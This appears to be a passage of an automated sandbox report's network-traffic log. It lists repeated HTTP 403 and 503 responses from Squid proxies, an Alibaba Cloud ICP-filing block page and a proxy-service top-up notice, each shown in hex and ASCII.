6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:31 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 